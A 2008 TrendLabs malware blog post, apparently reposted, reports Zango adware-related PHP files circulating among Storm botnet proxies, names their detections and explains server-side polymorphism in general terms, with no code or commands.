Chris Mosby at myITforum.com

Zango and Storm: Possibly in Cahoots

May 15th, 2008 by Macky Cruz (Technical Communications)

When security researchers encounter a piece of code, they often have little idea about its ultimate objective. Analysts have to play online gumshoe when it comes to tracing the relationship of a single file to what is very often a multi-component attack.

Storm has been on the foreground for quite some time as a primary example of how rampant (and undetected) zombified computers have become. Whenever analysts want to talk about the Internet’s propensity to help administer organized crime, the Storm botnet always comes to mind. There have been several reports in the past few months that point to Storm’s various nefarious activities:

• downloading Bancos info-stealers in February
• advertising Canadian pharmaceutical products in January
• phishing information from Royal Bank of Scotland customers, also in January

Now we are beginning to see Zango-related codes being passed around and distributed among known Storm proxies.

One of these files, now detected as TROJ_MUTANT.BN, is an AdPack kit that contains a file named zango.php. Within this file can be found CLSIDs that are similar to those modified in line with Zango or Hotbar routines.

The other PHP files, detected as either JS_AGENT.BB or PHP_MPHAK.AL, seem to be products of signature detection’s arch-enemy: server-side polymorphism. This is a technique that enables malware writers to produce a slightly different version of a file (technically a new variant) each time a request to access the remote malicious server (typically by an infected computer) is made.

The presence of these clues means either of two possibilities. One, that Storm is now targeting computers that have Zango adware installed in them, or two, that Storm has now been commissioned to deploy Zango adware. Zango (also ePIPO, 180solutions, HotBar) is an adware company notorious for planting software that runs on startup, displays advertisements, and comes bundled with other software.

Users with computers under the control of a botnet often have little idea that their units are involved in any of the activities that the botnet is currently performing. It therefore becomes a big responsibility for users to make sure not only that they are not infected by agents of these botnet malware (by using adequate and updated Web Threat Protection technology) but also that they are not aiding in carrying out online theft and fraud.

Zango and Storm: Possibly in Cahoots | TrendLabs | Malware Blog - by Trend Micro